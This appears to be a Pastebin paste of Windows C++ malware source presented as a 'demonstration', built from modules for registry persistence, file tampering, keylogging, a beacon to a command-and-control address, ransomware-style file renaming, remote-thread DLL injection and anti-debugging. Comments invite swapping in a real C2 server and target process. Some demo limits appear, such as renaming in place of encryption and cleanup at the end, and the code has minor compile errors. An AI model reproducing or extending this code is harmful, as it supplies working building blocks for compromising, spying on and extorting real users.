Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <iostream>
- #include <fstream>
- #include <string>
- #include <vector>
- #include <windows.h>
- #include <winreg.h>
- #include <direct.h>
- #include <filesystem>
- #include <chrono>
- #include <thread>
- #include <winsock2.h>
- #include <ws2tcpip.h>
- #include <Psapi.h>
- #include <TlHelp32.h>
- #include <Shlwapi.h>
- #include <Dbghelp.h>
- #pragma comment(lib, "ws2_32.lib")
- #pragma comment(lib, "Psapi.lib")
- #pragma comment(lib, "Shlwapi.lib")
- #pragma comment(lib, "Dbghelp.lib")
- namespace fs = std::filesystem;
- // Module: Persistence
- class Persistence {
- public:
- static void establish() {
- HKEY hKey;
- std::wstring path = fs::current_path().wstring() + L"\\malware.exe";
- if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
- RegSetValueEx(hKey, L"Malware", 0, REG_SZ, (BYTE*)path.c_str(), (DWORD)(path.length() + 1) * sizeof(wchar_t));
- RegCloseKey(hKey);
- std::wcout << L"[+] Persistence established" << std::endl;
- } else {
- std::wcout << L"[!] Failed to establish persistence" << std::endl;
- }
- }
- static void remove() {
- HKEY hKey;
- if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
- RegDeleteValue(hKey, L"Malware");
- RegCloseKey(hKey);
- std::wcout << L"[+] Removed persistence" << std::endl;
- }
- }
- };
- // Module: File Infection
- class FileInfection {
- public:
- static void infect() {
- for (const auto & entry : fs::directory_iterator(fs::current_path())) {
- if (entry.path().extension() == ".txt") {
- std::wofstream file(entry.path(), std::ios::app);
- if (file.is_open()) {
- file << L"\n\n[Malicious payload: This file has been compromised]";
- file.close();
- std::wcout << L"[*] Infected file: " << entry.path().wstring() << std::endl;
- }
- }
- }
- }
- };
- // Module: Data Exfiltration
- class DataExfiltration {
- public:
- static void exfiltrate(const fs::path& source, const fs::path& destination) {
- if (fs::exists(source)) {
- fs::copy_file(source, destination, fs::copy_options::overwrite_existing);
- std::wcout << L"[+] Sensitive data exfiltrated to: " << destination.wstring() << std::endl;
- } else {
- std::wcout << L"[!] File for data exfiltration not found" << std::endl;
- }
- }
- };
- // Module: Keylogger
- class Keylogger {
- private:
- std::wofstream logFile;
- public:
- Keylogger() {
- logFile.open("keylog.txt", std::ios::app);
- }
- ~Keylogger() {
- if (logFile.is_open()) logFile.close();
- }
- void start() {
- if (logFile.is_open()) {
- std::wcout << L"[+] Starting keylogger" << std::endl;
- for(int i = 0; i < 100; ++i) { // Log 100 keystrokes for demo
- if (_kbhit()) {
- wchar_t key = _getwch();
- if (key >= L'a' && key <= L'z') key = key - 32; // Convert to uppercase
- logFile << key;
- }
- std::this_thread::sleep_for(std::chrono::milliseconds(100));
- }
- std::wcout << L"[+] Keylogger stopped" << std::endl;
- } else {
- std::wcout << L"[!] Failed to start keylogger" << std::endl;
- }
- }
- };
- // Module: C2 Communication
- class C2Communication {
- public:
- static void communicate(const std::string& ipAddress, int port) {
- WSADATA wsaData;
- SOCKET ConnectSocket = INVALID_SOCKET;
- struct sockaddr_in clientService;
- if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
- std::wcout << L"[!] Failed to initialize Winsock" << std::endl;
- return;
- }
- ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
- if (ConnectSocket == INVALID_SOCKET) {
- std::wcout << L"[!] Error at socket()" << std::endl;
- WSACleanup();
- return;
- }
- clientService.sin_family = AF_INET;
- clientService.sin_addr.s_addr = inet_addr(ipAddress.c_str());
- clientService.sin_port = htons(port);
- if (connect(ConnectSocket, (SOCKADDR*)&clientService, sizeof(clientService)) == SOCKET_ERROR) {
- std::wcout << L"[!] Failed to connect to C2 server" << std::endl;
- closesocket(ConnectSocket);
- WSACleanup();
- return;
- }
- const char* message = "Malware beacon";
- send(ConnectSocket, message, strlen(message), 0);
- std::wcout << L"[+] Beacon sent to C2 server" << std::endl;
- closesocket(ConnectSocket);
- WSACleanup();
- }
- };
- // Module: Ransomware Simulation
- class Ransomware {
- public:
- static void encryptFiles() {
- for (const auto & entry : fs::directory_iterator(fs::current_path())) {
- std::wstring ext = entry.path().wstring().extension();
- if (ext == L".docx" || ext == L".pdf" || ext == L".txt") {
- fs::path encryptedPath = entry.path().wstring() + L".encrypted";
- fs::rename(entry.path(), encryptedPath);
- std::wcout << L"[*] File encrypted: " << entry.path().wstring() << L" -> " << encryptedPath.wstring() << std::endl;
- }
- }
- }
- static void decryptFiles() {
- for (const auto & entry : fs::directory_iterator(fs::current_path())) {
- if (entry.path().extension() == ".encrypted") {
- fs::path originalPath = entry.path().wstring().substr(0, entry.path().wstring().length() - 10); // remove .encrypted
- fs::rename(entry.path(), originalPath);
- std::wcout << L"[*] File decrypted for demo: " << entry.path().wstring() << std::endl;
- }
- }
- }
- };
- // Module: Process Injection
- class ProcessInjection {
- public:
- static void inject(const char* targetProcessName, const char* dllPath) {
- HANDLE hProcess = NULL, hThread = NULL;
- HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
- LPVOID pLoadLibrary = (LPVOID)GetProcAddress(hKernel32, "LoadLibraryA");
- PROCESSENTRY32 pe32;
- pe32.dwSize = sizeof(PROCESSENTRY32);
- HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if (hSnapshot == INVALID_HANDLE_VALUE) return;
- if (Process32First(hSnapshot, &pe32)) {
- do {
- if (strcmp(pe32.szExeFile, targetProcessName) == 0) {
- hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
- if (hProcess) {
- LPVOID pRemoteString = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
- if (pRemoteString) {
- WriteProcessMemory(hProcess, pRemoteString, (LPVOID)dllPath, strlen(dllPath) + 1, NULL);
- hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteString, 0, NULL);
- if (hThread) {
- WaitForSingleObject(hThread, INFINITE);
- VirtualFreeEx(hProcess, pRemoteString, 0, MEM_RELEASE);
- }
- }
- CloseHandle(hProcess);
- }
- break;
- }
- } while (Process32Next(hSnapshot, &pe32));
- }
- CloseHandle(hSnapshot);
- if (hThread) CloseHandle(hThread);
- std::wcout << L"[+] DLL injected into " << targetProcessName << std::endl;
- }
- };
- // Module: Anti-Debugging
- class AntiDebugging {
- public:
- static bool isDebuggerPresent() {
- return IsDebuggerPresent();
- }
- static void checkForDebuggers() {
- if (isDebuggerPresent()) {
- std::wcout << L"[!] Debugger detected, exiting..." << std::endl;
- exit(1);
- }
- }
- static void antiDebuggingLoop() {
- while (true) {
- checkForDebuggers();
- Sleep(1000); // Check every second
- }
- }
- };
- // Module: Privilege Escalation Check
- class PrivilegeEscalation {
- public:
- static bool isAdmin() {
- BOOL isAdmin = FALSE;
- PSID AdministratorsGroup;
- SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
- if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) {
- CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin);
- FreeSid(AdministratorsGroup);
- }
- return isAdmin;
- }
- };
- int main() {
- std::wcout << L"[!] Running Malware Demonstration" << std::endl;
- // Check for admin rights
- if (PrivilegeEscalation::isAdmin()) {
- std::wcout << L"[+] Running with admin rights" << std::endl;
- } else {
- std::wcout << L"[+] Running without admin rights" << std::endl;
- }
- // Anti-Debugging
- std::thread antiDebugThread(AntiDebugging::antiDebuggingLoop);
- antiDebugThread.detach();
- // Persistence
- Persistence::establish();
- // File Infection
- FileInfection::infect();
- // Data Exfiltration
- DataExfiltration::exfiltrate("sensitive_data.txt", "C:\\temp\\stolen_data.txt");
- // Keylogger
- Keylogger keylogger;
- keylogger.start();
- // C2 Communication
- C2Communication::communicate("127.0.0.1", 4444); // Replace with actual C2 server for real-world use
- // Ransomware
- Ransomware::encryptFiles();
- // Process Injection (Demo with notepad, replace with actual process name in real scenarios)
- ProcessInjection::inject("notepad.exe", "C:\\path\\to\\your\\dll.dll"); // Path to a DLL for demonstration
- // Clean up
- Persistence::remove();
- Ransomware::decryptFiles();
- fs::remove(L"C:\\temp\\stolen_data.txt");
- std::wcout << L"[+] Cleaned up operations" << std::endl;
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement